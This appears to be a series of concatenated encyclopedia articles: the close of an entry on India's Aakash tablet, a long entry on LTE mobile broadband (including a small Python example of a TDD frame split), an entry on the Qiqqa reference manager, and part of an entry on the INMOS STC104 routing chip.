Hindustan Computers Limited (HCL), Bharat Heavy Electricals Limited (BHEL), DataWind, Wishtel, and Telmoco Development Labs are interested in bidding in the Aakash 2 contract auction. The low-cost Aakash tablet is under trial at IIT Bombay and is being tested against the new specifications. The Indian government also hopes to produce the Aakash for the export market. On a visit to Turkmenistan in September 2012, the Indian telecom minister, Kapil Sibal, suggested forming a joint venture company which may manufacture the Aakash. In this joint venture, the Indian side would design the necessary hardware and software of the tablet, fulfilling the Turkmen side's needs. Besides supplying the low-cost tablets, the joint venture company could market the product to other international markets. According to allegations made in the Hindustan Times, the Tuli brothers "may have" procured these devices off-the-shelf from manufacturers in China and sold them to the Indian government at the purchase price. Suneet Singh Tuli, CEO of DataWind, however, insisted that only the manufacture of the motherboards was subcontracted to Chinese manufacturers, following which the components were placed in DIY kits which DataWind assembled and sold to the Indian government's HRD ministry. Chinese manufacturers allege that they sold "ready-to-use" tablets to DataWind, and that they manufactured the touch screens as well. Tuli, however, insists that the touch screens were manufactured by DataWind in Canada.

See also
DataWind
Aakash (Tablet Series)
BSNL Pantel Tablet
Nexus 7 Tablet
Aakash 2 (Ubislate 7Ci)
Simputer

References

External links

Tablet computers
Linux-based devices
Android (operating system) devices
Touchscreen portable media players
Tablet computers introduced in 2011
19752979
https://en.wikipedia.org/wiki/LTE%20%28telecommunication%29
LTE (telecommunication)
In telecommunications, Long-Term Evolution (LTE) is a standard for wireless broadband communication for mobile devices and data terminals, based on the GSM/EDGE and UMTS/HSPA standards. It improves on those standards' capacity and speed by using a different radio interface and core network improvements. LTE is the upgrade path for carriers with both GSM/UMTS networks and CDMA2000 networks. Because LTE frequencies and bands differ from country to country, only multi-band phones can use LTE in all countries where it is supported. The standard is developed by the 3GPP (3rd Generation Partnership Project) and is specified in its Release 8 document series, with minor enhancements described in Release 9. LTE is also called 3.95G and has been marketed as "4G LTE" and "Advanced 4G"; but it does not meet the technical criteria of a 4G wireless service, as specified in the 3GPP Release 8 and 9 document series for LTE Advanced. The requirements were set forth by the ITU-R organisation in the IMT Advanced specification; but, because of market pressure and the significant advances that WiMAX, Evolved High Speed Packet Access, and LTE bring to the original 3G technologies, ITU later decided that LTE and the aforementioned technologies can be called 4G technologies. The LTE Advanced standard formally satisfies the ITU-R requirements for being considered IMT-Advanced. To differentiate LTE Advanced and WiMAX-Advanced from current 4G technologies, ITU has defined them as "True 4G". Overview LTE stands for Long Term Evolution and is a registered trademark owned by ETSI (European Telecommunications Standards Institute) for the wireless data communications technology and a development of the GSM/UMTS standards. However, other nations and companies do play an active role in the LTE project. The goal of LTE was to increase the capacity and speed of wireless data networks using new DSP (digital signal processing) techniques and modulations that were developed around the turn of the millennium. A further goal was the redesign and simplification of the network architecture to an IP-based system with significantly reduced transfer latency compared with the 3G architecture. The LTE wireless interface is incompatible with 2G and 3G networks, so that it must be operated on a separate radio spectrum. LTE was first proposed in 2004 by Japan's NTT Docomo, with studies on the standard officially commenced in 2005. In May 2007, the LTE/SAE Trial Initiative (LSTI) alliance was founded as a global collaboration between vendors and operators with the goal of verifying and promoting the new standard in order to ensure the global introduction of the technology as quickly as possible. The LTE standard was finalized in December 2008, and the first publicly available LTE service was launched by TeliaSonera in Oslo and Stockholm on December 14, 2009, as a data connection with a USB modem. The LTE services were launched by major North American carriers as well, with the Samsung SCH-r900 being the world's first LTE Mobile phone starting on September 21, 2010, and Samsung Galaxy Indulge being the world's first LTE smartphone starting on February 10, 2011, both offered by MetroPCS, and the HTC ThunderBolt offered by Verizon starting on March 17 being the second LTE smartphone to be sold commercially. 
In Canada, Rogers Wireless was the first to launch LTE network on July 7, 2011, offering the Sierra Wireless AirCard 313U USB mobile broadband modem, known as the "LTE Rocket stick" then followed closely by mobile devices from both HTC and Samsung. Initially, CDMA operators planned to upgrade to rival standards called UMB and WiMAX, but major CDMA operators (such as Verizon, Sprint and MetroPCS in the United States, Bell and Telus in Canada, au by KDDI in Japan, SK Telecom in South Korea and China Telecom/China Unicom in China) have announced instead they intend to migrate to LTE. The next version of LTE is LTE Advanced, which was standardized in March 2011. Services are expected to commence in 2013. Additional evolution known as LTE Advanced Pro have been approved in year 2015. The LTE specification provides downlink peak rates of 300 Mbit/s, uplink peak rates of 75 Mbit/s and QoS provisions permitting a transfer latency of less than 5 ms in the radio access network. LTE has the ability to manage fast-moving mobiles and supports multi-cast and broadcast streams. LTE supports scalable carrier bandwidths, from 1.4 MHz to 20 MHz and supports both frequency division duplexing (FDD) and time-division duplexing (TDD). The IP-based network architecture, called the Evolved Packet Core (EPC) designed to replace the GPRS Core Network, supports seamless handovers for both voice and data to cell towers with older network technology such as GSM, UMTS and CDMA2000. The simpler architecture results in lower operating costs (for example, each E-UTRA cell will support up to four times the data and voice capacity supported by HSPA). History 3GPP standard development timeline In 2004, NTT Docomo of Japan proposes LTE as the international standard. In September 2006, Siemens Networks (today Nokia Networks) showed in collaboration with Nomor Research the first live emulation of an LTE network to the media and investors. As live applications two users streaming an HDTV video in the downlink and playing an interactive game in the uplink have been demonstrated. In February 2007, Ericsson demonstrated for the first time in the world, LTE with bit rates up to 144 Mbit/s In September 2007, NTT Docomo demonstrated LTE data rates of 200 Mbit/s with power level below 100 mW during the test. In November 2007, Infineon presented the world's first RF transceiver named SMARTi LTE supporting LTE functionality in a single-chip RF silicon processed in CMOS In early 2008, LTE test equipment began shipping from several vendors and, at the Mobile World Congress 2008 in Barcelona, Ericsson demonstrated the world's first end-to-end mobile call enabled by LTE on a small handheld device. Motorola demonstrated an LTE RAN standard compliant eNodeB and LTE chipset at the same event. At the February 2008 Mobile World Congress: Motorola demonstrated how LTE can accelerate the delivery of personal media experience with HD video demo streaming, HD video blogging, Online gaming and VoIP over LTE running a RAN standard compliant LTE network & LTE chipset. Ericsson EMP (now ST-Ericsson) demonstrated the world's first end-to-end LTE call on handheld Ericsson demonstrated LTE FDD and TDD mode on the same base station platform. Freescale Semiconductor demonstrated streaming HD video with peak data rates of 96 Mbit/s downlink and 86 Mbit/s uplink. NXP Semiconductors (now a part of ST-Ericsson) demonstrated a multi-mode LTE modem as the basis for a software-defined radio system for use in cellphones. 
picoChip and Mimoon demonstrated a base station reference design. This runs on a common hardware platform (multi-mode / software-defined radio) with their WiMAX architecture.
In April 2008, Motorola demonstrated the first EV-DO to LTE hand-off, handing over a streaming video from LTE to a commercial EV-DO network and back to LTE.
In April 2008, LG Electronics and Nortel demonstrated LTE data rates of 50 Mbit/s while travelling at 110 km/h (68 mph).
In November 2008, Motorola demonstrated the industry's first over-the-air LTE session in 700 MHz spectrum.
Researchers at Nokia Siemens Networks and the Heinrich Hertz Institut demonstrated LTE with 100 Mbit/s uplink transfer speeds.
At the February 2009 Mobile World Congress:
Infineon demonstrated a single-chip 65 nm CMOS RF transceiver providing 2G/3G/LTE functionality.
Launch of the ng Connect program, a multi-industry consortium founded by Alcatel-Lucent to identify and develop wireless broadband applications.
Motorola provided an LTE drive tour on the streets of Barcelona to demonstrate LTE system performance in a real-life metropolitan RF environment.
In July 2009, Nujira demonstrated efficiencies of more than 60% for an 880 MHz LTE power amplifier.
In August 2009, Nortel and LG Electronics demonstrated the first successful handoff between CDMA and LTE networks in a standards-compliant manner.
In August 2009, Alcatel-Lucent received FCC certification for LTE base stations for the 700 MHz spectrum band.
In September 2009, Nokia Siemens Networks demonstrated the world's first LTE call on standards-compliant commercial software.
In October 2009, Ericsson and Samsung demonstrated interoperability between the first ever commercial LTE device and the live network in Stockholm, Sweden.
In October 2009, Alcatel-Lucent's Bell Labs, Deutsche Telekom Innovation Laboratories, the Fraunhofer Heinrich-Hertz Institut and antenna supplier Kathrein conducted live field tests of a technology called Coordinated Multipoint Transmission (CoMP) aimed at increasing the data transmission speeds of LTE and 3G networks.
In November 2009, Alcatel-Lucent completed the first live LTE call using the 800 MHz spectrum band set aside as part of the European Digital Dividend (EDD).
In November 2009, Nokia Siemens Networks and LG completed the first end-to-end interoperability testing of LTE.
On December 14, 2009, the first commercial LTE deployment was launched in the Scandinavian capitals Stockholm and Oslo by the Swedish-Finnish network operator TeliaSonera and its Norwegian brand name NetCom (Norway). TeliaSonera incorrectly branded the network "4G". The modem devices on offer were manufactured by Samsung (dongle GT-B3710), and the network infrastructure, with SingleRAN technology, was created by Huawei (in Oslo) and Ericsson (in Stockholm). TeliaSonera planned to roll out nationwide LTE across Sweden, Norway and Finland. TeliaSonera used a spectral bandwidth of 10 MHz (out of the maximum 20 MHz) and single-input single-output transmission. The deployment should have provided physical layer net bit rates of up to 50 Mbit/s in the downlink and 25 Mbit/s in the uplink. Introductory tests showed a TCP goodput of 42.8 Mbit/s downlink and 5.3 Mbit/s uplink in Stockholm.
In December 2009, ST-Ericsson and Ericsson were the first to achieve LTE and HSPA mobility with a multimode device.
In January 2010, Alcatel-Lucent and LG completed a live handoff of an end-to-end data call between LTE and CDMA networks.
In February 2010, Nokia Siemens Networks and Movistar tested LTE at the Mobile World Congress 2010 in Barcelona, Spain, with both indoor and outdoor demonstrations.
In May 2010, Mobile TeleSystems (MTS) and Huawei showed an indoor LTE network at "Sviaz-Expocomm 2010" in Moscow, Russia. MTS expected to start a trial LTE service in Moscow by the beginning of 2011. Earlier, MTS had received a license to build an LTE network in Uzbekistan, and intended to commence a test LTE network in Ukraine in partnership with Alcatel-Lucent.
At the Shanghai Expo 2010 in May 2010, Motorola demonstrated a live LTE network in conjunction with China Mobile. This included video streams and a drive test system using TD-LTE.
As of 12/10/2010, DirecTV had teamed up with Verizon Wireless for a test of high-speed LTE wireless technology in a few homes in Pennsylvania, designed to deliver an integrated Internet and TV bundle.
Verizon Wireless said it launched LTE wireless services (for data, no voice) on Sunday, December 5, in 38 markets where more than 110 million Americans live.
On May 6, 2011, Sri Lanka Telecom Mobitel demonstrated 4G LTE for the first time in South Asia, achieving a data rate of 96 Mbit/s in Sri Lanka.
Carrier adoption timeline
Most carriers supporting GSM or HSUPA networks can be expected to upgrade their networks to LTE at some stage.
August 2009: Telefónica selected six countries to field-test LTE in the succeeding months: Spain, the United Kingdom, Germany and the Czech Republic in Europe, and Brazil and Argentina in Latin America.
On November 24, 2009, Telecom Italia announced the first outdoor pre-commercial trial in the world, deployed in Torino and fully integrated into the 2G/3G network then in service.
On December 14, 2009, the world's first publicly available LTE service was opened by TeliaSonera in the two Scandinavian capitals Stockholm and Oslo.
On May 28, 2010, Russian operator Scartel announced the launch of an LTE network in Kazan by the end of 2010.
On October 6, 2010, Canadian provider Rogers Communications Inc announced that Ottawa, Canada's national capital, would be the site of LTE trials. Rogers said it would expand on this testing and move to a comprehensive technical trial of LTE on both low- and high-band frequencies across the Ottawa area.
On May 6, 2011, Sri Lanka Telecom Mobitel successfully demonstrated 4G LTE for the first time in South Asia, achieving a data rate of 96 Mbit/s in Sri Lanka.
On May 7, 2011, Sri Lankan mobile operator Dialog Axiata PLC switched on the first pilot 4G LTE network in South Asia with vendor partner Huawei and demonstrated a download data speed of up to 127 Mbit/s.
On February 9, 2012, Telus Mobility launched their LTE service, initially in metropolitan areas including Vancouver, Calgary, Edmonton, Toronto and the Greater Toronto Area, Kitchener, Waterloo, Hamilton, Guelph, Belleville, Ottawa, Montreal, Québec City, Halifax and Yellowknife. Telus Mobility had announced that it would adopt LTE as its 4G wireless standard.
Cox Communications erected its first tower for its wireless LTE network build-out; wireless services launched in late 2009.
In March 2019, the Global Mobile Suppliers Association reported that there were now 717 operators with commercially launched LTE networks (broadband fixed wireless access and/or mobile).
OpenSignal.com published a ranking of the top 10 countries/territories by 4G LTE coverage in February/March 2019.
For the complete list of all the countries/territories, see list of countries by 4G LTE penetration.
LTE-TDD and LTE-FDD
Long-Term Evolution Time-Division Duplex (LTE-TDD), also referred to as TDD LTE, is a 4G telecommunications technology and standard co-developed by an international coalition of companies, including China Mobile, Datang Telecom, Huawei, ZTE, Nokia Solutions and Networks, Qualcomm, Samsung, and ST-Ericsson. It is one of the two mobile data transmission technologies of the Long-Term Evolution (LTE) technology standard, the other being Long-Term Evolution Frequency-Division Duplex (LTE-FDD). While some companies refer to LTE-TDD as "TD-LTE" for familiarity with TD-SCDMA, there is no reference to that abbreviation anywhere in the 3GPP specifications.
There are two major differences between LTE-TDD and LTE-FDD: how data is uploaded and downloaded, and what frequency spectra the networks are deployed in. While LTE-FDD uses paired frequencies to upload and download data, LTE-TDD uses a single frequency, alternating between uploading and downloading data over time. The ratio between uploads and downloads on an LTE-TDD network can be changed dynamically, depending on whether more data needs to be sent or received (a short illustrative sketch appears below). LTE-TDD and LTE-FDD also operate on different frequency bands, with LTE-TDD working better at higher frequencies, and LTE-FDD working better at lower frequencies. Frequencies used for LTE-TDD range from 1850 MHz to 3800 MHz, with several different bands being used. The LTE-TDD spectrum is generally cheaper to access, and has less traffic. Further, the bands for LTE-TDD overlap with those used for WiMAX, which can easily be upgraded to support LTE-TDD.
Despite the differences in how the two types of LTE handle data transmission, LTE-TDD and LTE-FDD share 90 percent of their core technology, making it possible for the same chipsets and networks to use both versions of LTE. A number of companies produce dual-mode chips or mobile devices, including Samsung and Qualcomm, while operators CMHK and Hi3G Access have developed dual-mode networks in Hong Kong and Sweden, respectively.
History of LTE-TDD
The creation of LTE-TDD involved a coalition of international companies that worked to develop and test the technology. China Mobile was an early proponent of LTE-TDD, along with other companies like Datang Telecom and Huawei, which worked to deploy LTE-TDD networks, and later developed technology allowing LTE-TDD equipment to operate in white spaces (frequency spectra between broadcast TV stations). Intel also participated in the development, setting up an LTE-TDD interoperability lab with Huawei in China, as well as ST-Ericsson, Nokia, and Nokia Siemens (now Nokia Solutions and Networks), which developed LTE-TDD base stations that increased capacity by 80 percent and coverage by 40 percent. Qualcomm also participated, developing the world's first multi-mode chip, combining both LTE-TDD and LTE-FDD, along with HSPA and EV-DO. Accelleran, a Belgian company, has also worked to build small cells for LTE-TDD networks.
Trials of LTE-TDD technology began as early as 2010, with Reliance Industries and Ericsson India conducting field tests of LTE-TDD in India, achieving 80 megabit-per-second download speeds and 20 megabit-per-second upload speeds. By 2011, China Mobile began trials of the technology in six cities.
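As flagged above, the following toy sketch shows how an LTE-TDD uplink-downlink pattern translates into a downlink/uplink time split over one radio frame. The ten-subframe pattern used here is the commonly cited TDD configuration 1; treat the sketch as an illustration of the idea rather than a normative statement of the 3GPP tables.

```python
# Illustrative only: how a TDD uplink-downlink pattern shares a single
# carrier in time. One 10 ms radio frame = 10 subframes of 1 ms each.
# D = downlink, S = special (switching), U = uplink.

def dl_ul_split(pattern):
    """Count downlink, special and uplink subframes in a frame pattern."""
    return {kind: pattern.count(kind) for kind in "DSU"}

frame = "DSUUDDSUUD"          # commonly cited TDD configuration 1
counts = dl_ul_split(frame)
print(counts)                  # {'D': 4, 'S': 2, 'U': 4}

# Ignoring the special subframes, this pattern devotes roughly equal time
# to each direction; other configurations shift the balance toward downlink.
print("DL:UL subframes =", counts["D"], ":", counts["U"])
```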
Although initially seen as a technology utilized by only a few countries, including China and India, by 2011 international interest in LTE-TDD had expanded, especially in Asia, in part due to LTE-TDD's lower cost of deployment compared to LTE-FDD. By the middle of that year, 26 networks around the world were conducting trials of the technology. The Global LTE-TDD Initiative (GTI) was also started in 2011, with founding partners China Mobile, Bharti Airtel, SoftBank Mobile, Vodafone, Clearwire, Aero2 and E-Plus. In September 2011, Huawei announced it would partner with Polish mobile provider Aero2 to develop a combined LTE-TDD and LTE-FDD network in Poland, and by April 2012, ZTE Corporation had worked to deploy trial or commercial LTE-TDD networks for 33 operators in 19 countries. In late 2012, Qualcomm worked extensively to deploy a commercial LTE-TDD network in India, and partnered with Bharti Airtel and Huawei to develop the first multi-mode LTE-TDD smartphone for India.
In Japan, SoftBank Mobile launched LTE-TDD services in February 2012 under the name Advanced eXtended Global Platform (AXGP), marketed as SoftBank 4G. The AXGP band was previously used for Willcom's PHS service, and after PHS was discontinued in 2010, the PHS band was re-purposed for AXGP service.
In the U.S., Clearwire planned to implement LTE-TDD, with chip-maker Qualcomm agreeing to support Clearwire's frequencies on its multi-mode LTE chipsets. With Sprint's acquisition of Clearwire in 2013, the carrier began using these frequencies for LTE service on networks built by Samsung, Alcatel-Lucent, and Nokia.
As of March 2013, 156 commercial 4G LTE networks existed, including 142 LTE-FDD networks and 14 LTE-TDD networks. As of November 2013, the South Korean government planned to allow a fourth wireless carrier in 2014, which would provide LTE-TDD services, and in December 2013, LTE-TDD licenses were granted to China's three mobile operators, allowing commercial deployment of 4G LTE services.
In January 2014, Nokia Solutions and Networks indicated that it had completed a series of tests of voice over LTE (VoLTE) calls on China Mobile's TD-LTE network. The next month, Nokia Solutions and Networks and Sprint announced that they had demonstrated throughput speeds of 2.6 gigabits per second using an LTE-TDD network, surpassing the previous record of 1.6 gigabits per second.
Features
Much of the LTE standard addresses the upgrading of 3G UMTS to what will eventually be 4G mobile communications technology. A large amount of the work is aimed at simplifying the architecture of the system, as it transitions from the existing UMTS circuit + packet switching combined network to an all-IP flat architecture system. E-UTRA is the air interface of LTE. Its main features are:
Peak download rates up to 299.6 Mbit/s and upload rates up to 75.4 Mbit/s depending on the user equipment category (with 4×4 antennas using 20 MHz of spectrum). Five different terminal classes have been defined, from a voice-centric class up to a high-end terminal that supports the peak data rates. All terminals will be able to process 20 MHz bandwidth.
Low data transfer latencies (sub-5 ms latency for small IP packets in optimal conditions), lower latencies for handover and connection setup time than with previous radio access technologies.
Improved support for mobility, exemplified by support for terminals moving at up to 350 km/h or 500 km/h depending on the frequency band.
Orthogonal frequency-division multiple access for the downlink, single-carrier FDMA for the uplink to conserve power.
Support for both FDD and TDD communication systems as well as half-duplex FDD with the same radio access technology.
Support for all frequency bands currently used by IMT systems as defined by the ITU-R.
Increased spectrum flexibility: 1.4 MHz, 3 MHz, 5 MHz, 10 MHz, 15 MHz and 20 MHz wide cells are standardized. (W-CDMA has no option other than 5 MHz slices, leading to some roll-out problems in countries where 5 MHz is a commonly allocated width of spectrum and so would frequently already be in use by legacy standards such as 2G GSM and cdmaOne.)
Support for cell sizes from tens of metres radius (femto and picocells) up to 100 km radius macrocells. In the lower frequency bands to be used in rural areas, 5 km is the optimal cell size, with 30 km having reasonable performance, and up to 100 km cell sizes supported with acceptable performance. In the city and urban areas, higher frequency bands (such as 2.6 GHz in the EU) are used to support high-speed mobile broadband. In this case, cell sizes may be 1 km or even less.
Support of at least 200 active data clients (connected users) in every 5 MHz cell.
Simplified architecture: the network side of E-UTRAN is composed only of eNodeBs.
Support for inter-operation and co-existence with legacy standards (e.g., GSM/EDGE, UMTS and CDMA2000). Users can start a call or transfer of data in an area using an LTE standard, and, should coverage be unavailable, continue the operation without any action on their part using GSM/GPRS or W-CDMA-based UMTS or even 3GPP2 networks such as cdmaOne or CDMA2000.
Uplink and downlink carrier aggregation.
Packet-switched radio interface.
Support for MBSFN (multicast-broadcast single-frequency network). This feature can deliver services such as Mobile TV using the LTE infrastructure, and is a competitor to DVB-H-based TV broadcast; only LTE-compatible devices can receive the LTE signal.
Voice calls
The LTE standard supports only packet switching with its all-IP network. Voice calls in GSM, UMTS and CDMA2000 are circuit-switched, so with the adoption of LTE, carriers will have to re-engineer their voice call networks. Four different approaches sprang up:
Voice over LTE (VoLTE)
Circuit-switched fallback (CSFB)
In this approach, LTE just provides data services, and when a voice call is to be initiated or received, it falls back to the circuit-switched domain. When using this solution, operators just need to upgrade the MSC instead of deploying the IMS, and can therefore provide services quickly. However, the disadvantage is a longer call setup delay.
Simultaneous voice and LTE (SVLTE)
In this approach, the handset works simultaneously in the LTE and circuit-switched modes, with the LTE mode providing data services and the circuit-switched mode providing the voice service. This is a solution based solely on the handset, which has no special requirements on the network and does not require the deployment of IMS. The disadvantage of this solution is that the phone can become expensive, with high power consumption.
Single Radio Voice Call Continuity (SRVCC)
One additional approach, not initiated by operators, is the use of over-the-top content (OTT) services, using applications like Skype and Google Talk to provide LTE voice service.
Most major backers of LTE preferred and promoted VoLTE from the beginning.
The lack of software support in initial LTE devices, as well as core network devices, however led to a number of carriers promoting VoLGA (Voice over LTE Generic Access) as an interim solution. The idea was to use the same principles as GAN (Generic Access Network, also known as UMA or Unlicensed Mobile Access), which defines the protocols through which a mobile handset can perform voice calls over a customer's private Internet connection, usually over wireless LAN. VoLGA however never gained much support, because VoLTE (IMS) promises much more flexible services, albeit at the cost of having to upgrade the entire voice call infrastructure. VoLTE will also require Single Radio Voice Call Continuity (SRVCC) in order to be able to smoothly perform a handover to a 3G network in case of poor LTE signal quality. While the industry has seemingly standardized on VoLTE for the future, the demand for voice calls today has led LTE carriers to introduce circuit-switched fallback as a stopgap measure. When placing or receiving a voice call, LTE handsets will fall back to old 2G or 3G networks for the duration of the call. Enhanced voice quality To ensure compatibility, 3GPP demands at least AMR-NB codec (narrow band), but the recommended speech codec for VoLTE is Adaptive Multi-Rate Wideband, also known as HD Voice. This codec is mandated in 3GPP networks that support 16 kHz sampling. Fraunhofer IIS has proposed and demonstrated "Full-HD Voice", an implementation of the AAC-ELD (Advanced Audio CodingEnhanced Low Delay) codec for LTE handsets. Where previous cell phone voice codecs only supported frequencies up to 3.5 kHz and upcoming wideband audio services branded as HD Voice up to 7 kHz, Full-HD Voice supports the entire bandwidth range from 20 Hz to 20 kHz. For end-to-end Full-HD Voice calls to succeed, however, both the caller and recipient's handsets, as well as networks, have to support the feature. Frequency bands The LTE standard covers a range of many different bands, each of which is designated by both a frequency and a band number: North America 600, 700, 850, 1700, 1900, 2300, 2500, 2600, 3500, 5000 MHz (bands 2, 4, 5, 7, 12, 13, 14, 17, 25, 26, 29, 30, 38, 40, 41, 42, 43, 46, 48, 66, 71) Latin America and Caribbean 600, 700, 800, 850, 900, 1700, 1800, 1900, 2100, 2300, 2500, 2600, 3500, 5000 MHz (bands 1, 2, 3, 4, 5, 7, 8, 12, 13, 14, 17, 20, 25, 26, 28, 29, 38, 40, 41, 42, 43, 46, 48, 66, 71) Europe 450, 700, 800, 900, 1500, 1800, 2100, 2300, 2600, 3500, 3700 MHz (bands 1, 3, 7, 8, 20, 22, 28, 31, 32, 38, 40, 42, 43) Asia 450, 700, 800, 850, 900, 1500, 1800, 1900, 2100, 2300, 2500, 2600, 3500 MHz (bands 1, 3, 5, 7, 8, 11, 18, 19, 20, 21, 26, 28, 31, 38, 39, 40, 41, 42) Africa 700, 800, 850, 900, 1800, 2100, 2500, 2600 MHz (bands 1, 3, 5, 7, 8, 20, 28, 41) Oceania (incl. Australia and New Zealand) 700, 800, 850, 1800, 2100, 2300, 2600 MHz (bands 1, 3, 7, 12, 20, 28, 40) As a result, phones from one country may not work in other countries. Users will need a multi-band capable phone for roaming internationally. Patents According to the European Telecommunications Standards Institute's (ETSI) intellectual property rights (IPR) database, about 50 companies have declared, as of March 2012, holding essential patents covering the LTE standard. The ETSI has made no investigation on the correctness of the declarations however, so that "any analysis of essential LTE patents should take into account more than ETSI declarations." 
Independent studies have found that about 3.3 to 5 percent of all revenues from handset manufacturers are spent on standard-essential patents. This is less than the combined published rates, due to reduced-rate licensing agreements, such as cross-licensing.
See also
4G-LTE filter
Comparison of wireless data standards
E-UTRA – the radio access network used in LTE
HSPA+ – an enhancement of the 3GPP HSPA standard
Flat IP – flat IP architectures in mobile networks
LTE-A Pro
LTE-A
LTE-U
NarrowBand IoT (NB-IoT)
Simulation of LTE Networks
QoS Class Identifier (QCI) – the mechanism used in LTE networks to allocate proper Quality of Service to bearer traffic
System architecture evolution – the re-architecturing of core networks in LTE
WiMAX – a competitor to LTE
References
Further reading
Agilent Technologies, LTE and the Evolution to 4G Wireless: Design and Measurement Challenges, John Wiley & Sons, 2009
Beaver, Paul, "What is TD-LTE?", RF&Microwave Designline, September 2011.
E. Dahlman, H. Ekström, A. Furuskär, Y. Jading, J. Karlsson, M. Lundevall, and S. Parkvall, "The 3G Long-Term Evolution – Radio Interface Concepts and Performance Evaluation", IEEE Vehicular Technology Conference (VTC) 2006 Spring, Melbourne, Australia, May 2006
Erik Dahlman, Stefan Parkvall, Johan Sköld, Per Beming, 3G Evolution – HSPA and LTE for Mobile Broadband, 2nd edition, Academic Press, 2008
Erik Dahlman, Stefan Parkvall, Johan Sköld, 4G – LTE/LTE-Advanced for Mobile Broadband, Academic Press, 2011
Sajal K. Das, John Wiley & Sons (April 2010): Mobile Handset Design.
Sajal K. Das, John Wiley & Sons (April 2016): Mobile Terminal Receiver Design: LTE and LTE-Advanced.
H. Ekström, A. Furuskär, J. Karlsson, M. Meyer, S. Parkvall, J. Torsner, and M. Wahlqvist, "Technical Solutions for the 3G Long-Term Evolution", IEEE Commun. Mag., vol. 44, no. 3, March 2006, pp. 38–45
Mustafa Ergen, Mobile Broadband: Including WiMAX and LTE, Springer, NY, 2009
K. Fazel and S. Kaiser, Multi-Carrier and Spread Spectrum Systems: From OFDM and MC-CDMA to LTE and WiMAX, 2nd Edition, John Wiley & Sons, 2008
Dan Forsberg, Günther Horn, Wolf-Dietrich Moeller, Valtteri Niemi, LTE Security, Second Edition, John Wiley & Sons Ltd, Chichester 2013
Borko Furht, Syed A. Ahson, Long Term Evolution: 3GPP LTE Radio and Cellular Technology, CRC Press, 2009
Chris Johnson, LTE in BULLETS, CreateSpace, 2010
F. Khan, LTE for 4G Mobile Broadband – Air Interface Technologies and Performance, Cambridge University Press, 2009
Guowang Miao, Jens Zander, Ki Won Sung, and Ben Slimane, Fundamentals of Mobile Data Networks, Cambridge University Press, 2016
Stefania Sesia, Issam Toufik, and Matthew Baker, LTE – The UMTS Long Term Evolution: From Theory to Practice, Second Edition including Release 10 for LTE-Advanced, John Wiley & Sons, 2011
Gautam Siwach, Dr Amir Esmailpour, "LTE Security Potential Vulnerability and Algorithm Enhancements", IEEE Canadian Conference on Electrical and Computer Engineering (IEEE CCECE), Toronto, Canada, May 2014
SeungJune Yi, SungDuck Chun, YoungDae Lee, SungJun Park, SungHoon Jung, Radio Protocols for LTE and LTE-Advanced, Wiley, 2012
Y. Zhou, Z. Lei and S. H. Wong, Evaluation of Mobility Performance in 3GPP Heterogeneous Networks, 2014 IEEE 79th Vehicular Technology Conference (VTC Spring), Seoul, 2014, pp. 1–5.
External links LTE homepage from the 3GPP website LTE Frequently Asked Questions LTE Deployment Map A Simple Introduction to the LTE Downlink LTE-3GPP.info: online LTE messages decoder fully supporting Rel.14 Wireless networking standards Japanese inventions Mobile telecommunications Mobile telecommunications standards Telecommunications
27388002
https://en.wikipedia.org/wiki/Qiqqa
Qiqqa
Qiqqa (pronounced "Quicker") is a free and open-source software application that allows researchers to work with thousands of PDFs. It combines PDF reference management tools, a citation manager, and a mind map brainstorming tool. It integrates with Microsoft Word XP, 2003, 2007 and 2010 and with BibTeX/LaTeX to automatically produce citations and bibliographies in thousands of styles.
The development of Qiqqa began in Cambridge, UK, in December 2009. A public alpha was released in April 2010, offering PDF management and brainstorming capabilities. Subsequent releases have seen the incorporation of the Web Library, OCR, integration with BibTeX and other reference managers, and the use of natural language processing (NLP) techniques to guide researchers in their reading.
Shortly after its release, Qiqqa was noticed by universities and their libraries. In 2011, Qiqqa won the University of Cambridge CUE and CUTEC competitions, as well as the Cambridge Wireless Discovering Start-Ups competition. Qiqqa was an award winner in the 2012 Santander Universities Entrepreneurship Awards.
In 2020, Qiqqa changed its pricing model and became free and open source: "After 10 years of your support we have decided to make Qiqqa open source so that it can be grown and extended by its community of thousands of active users."
Qiqqa does not appear to have attracted a large user base compared to other reference management programs developed since 2006.
See also
Comparison of reference management software
Computer-assisted qualitative data analysis software
References
External links
Document management systems Free BibTeX software Free note-taking software Free reference management software Mind-mapping software Note-taking software PDF readers QDA software Reference management software Software that uses XUL
51050694
https://en.wikipedia.org/wiki/STC104
STC104
The STC104 switch, also known as the C104 switch in its early phases, is an asynchronous packet-routing chip that was designed for building high-performance point-to-point computer communication networks. It was developed by INMOS in the 1990s and was the first example of a general-purpose production packet routing chip. It was also the first routing chip to implement wormhole routing, to decouple packet size from the flow-control protocol, and to implement interval and two-phase randomized routing. The STC104 has 32 bidirectional communication links, called DS-Links, that each operate at 100 Mbit/s. These links are connected by a non-blocking crossbar that allows simultaneous transmission of packets between all input and output links. Switching The STC104 uses wormhole switching to reduce latency and the per-link buffering requirement. Wormhole switching works by splitting packets into fixed-size chunks (called flits) for transmission, allowing the packet to be pipelined in the network. The first header flit opens a route (or circuit) through each switch in the network, allowing subsequent flits to experience no switching delay. The final flit closes the route. Since the header flit can proceed independently of the subsequent flits, the latency of the packet is independent of its size. Consequently, the amount of buffering provided by links can also be chosen independently of the packet size. Furthermore, the total buffering requirement is small since, typically, only a small number of flits need to be stored for each link. This is in contrast to store-and-forward switching, where a whole packet must be buffered at each link end point. Routing Messages are routed in networks of C104s using interval routing. In a network where each destination is uniquely numbered, interval routing associates non-overlapping, contiguous ranges of destinations with each output link. An output link for a packet is chosen by comparing the destination (contained in the packet's header) to each interval and choosing the one that contains the destination. The benefits of interval routing are that it is sufficient to provide deterministic routing on a range of network topologies and that can be implemented simply with a table-based lookup, so it delivers routing decisions with low latency. Interval routing can be used to implement efficient routing strategies for many classes of regular network topology. In some networks, multiple links will connect to the same STC104 or processor endpoint, or to a set of equivalent devices. In this circumstance, the STC104 provides a mechanism for grouped adaptive routing, where bundles of links can share the same interval and a link is chosen adaptively from a bundle based on its availability. This mechanism makes efficient use of the available link bandwidth by ensuring a packet does not wait for a link while another equivalent one is available. An additional ability of interval routing is to partition the network into independent sub networks. This can be used to prevent deadlock or to separate high-priority traffic to travel without contention. Header deletion To support routing in hierarchical networks, such as multi-stage butterfly or Clos networks, the STC104 provides a mechanism for header deletion. Each output link that is connected to the next level of the hierarchy can be programmed to discard the header, so that the packet is subsequently routed by the new packet header, which immediately precedes the deleted one. 
